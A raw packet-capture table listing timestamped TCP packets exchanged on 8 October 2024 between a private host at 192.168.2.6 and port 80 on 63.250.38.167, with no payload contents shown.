Oct 8, 2024 11:30:20.294193983 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.294280052 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.294368029 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.294512033 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.294553041 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.294596910 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.294962883 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.294986963 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.295030117 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.295248032 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.295272112 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.295310974 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.295644999 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.295695066 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.295739889 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.297728062 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.297780037 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.297794104 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.297811031 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.297821045 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.297852039 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.297915936 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.297950029 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.297966003 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.297981977 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.297991037 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.298022032 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.298341036 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.298388958 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.298403025 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.298418045 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.298424959 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.298460007 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.298763037 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.298789024 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.298804045 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.298820972 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.298830032 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.298861027 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.299191952 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299207926 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299223900 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299240112 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299251080 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.299280882 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.299562931 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299622059 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299638033 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299654007 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299664974 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.299695969 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.299978971 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.299993038 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300009012 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300024033 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300033092 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.300069094 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.300407887 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300425053 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300441027 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300456047 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300465107 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.300497055 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.300734997 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300825119 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300868034 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.300913095 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300940990 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.300983906 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.302666903 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.302681923 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.302697897 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.302711964 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.302725077 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.302756071 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.302824020 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.302838087 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.302854061 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.302869081 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.302876949 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.302911043 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.303232908 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303250074 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303266048 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303281069 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303292990 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.303328037 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.303519011 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303534031 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303550005 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303565025 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303596973 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.303617954 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.303854942 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303870916 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303884983 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303900003 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.303911924 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.303944111 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.304137945 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304152966 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304167986 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304183006 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304193020 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.304227114 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.304420948 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304435015 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304450989 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304465055 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304492950 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.304522038 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.304709911 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304724932 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304748058 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304761887 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.304764032 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304800987 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.304944992 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304969072 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.304984093 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305007935 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305010080 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.305047989 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.305228949 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305243969 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305258989 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305274963 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305283070 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.305316925 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.305510044 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305525064 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305541039 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305556059 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305562973 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.305597067 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.305742025 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305757046 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305773020 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305788040 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.305797100 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.305830002 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.305993080 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306006908 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306024075 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306039095 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306049109 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306081057 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306186914 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306202888 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306220055 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306237936 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306243896 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306278944 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306417942 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306433916 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306451082 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306467056 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306476116 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306508064 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306632996 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306648016 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306663036 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306689978 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306757927 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306780100 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306794882 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306798935 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306809902 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306828022 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306835890 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306842089 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306857109 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306865931 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306871891 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306889057 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.306915045 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.306935072 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308299065 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308321953 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308345079 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308358908 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308365107 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308382988 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308397055 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308398962 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308413029 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308429003 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308437109 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308442116 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308456898 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308460951 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308473110 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308487892 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308497906 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308502913 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308517933 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308526993 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308532953 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308548927 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308557987 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308563948 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308579922 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308587074 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308595896 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308610916 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308621883 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308626890 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308641911 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308650017 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308655977 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308677912 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308697939 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308701992 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308716059 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308726072 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308769941 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308784962 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308794975 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308798075 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308808088 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308815002 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308824062 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.308859110 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.308895111 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309503078 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309526920 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309541941 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309556007 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309567928 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309571028 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309597015 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309600115 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309623957 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309638023 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309640884 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309653044 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309667110 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309683084 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309684992 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309698105 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309710979 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309715033 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309730053 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309737921 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309745073 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309758902 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309768915 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309775114 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309789896 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309801102 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309804916 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309819937 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309834957 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309834957 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309849024 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309860945 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309864998 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309880018 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.309890032 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.309927940 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310621977 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310643911 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310658932 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310672998 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310682058 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310688972 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310703993 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310719013 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310720921 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310735941 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310745001 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310760021 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310775042 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310776949 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310790062 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310805082 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310816050 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310820103 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310833931 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310839891 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310848951 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310863972 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310872078 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310879946 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310893059 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310904980 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310908079 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310924053 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310934067 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310937881 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310951948 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310961008 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.310966969 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310982943 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310996056 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.310996056 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311012030 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311022043 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311028004 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311053038 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311084032 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311099052 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311129093 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311222076 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311238050 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311254978 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311263084 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311270952 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311285973 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311291933 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311301947 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311316967 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311321974 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311331034 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311358929 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311368942 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311398983 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311412096 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311413050 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311436892 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311450005 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311451912 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311465979 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311480999 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311487913 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311495066 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311510086 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311520100 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311525106 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311539888 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311547995 CEST	49749	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:20.311557055 CEST	80	49749	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:20.311572075 CEST	80	49749	63.250.38.167	192.168.2.6
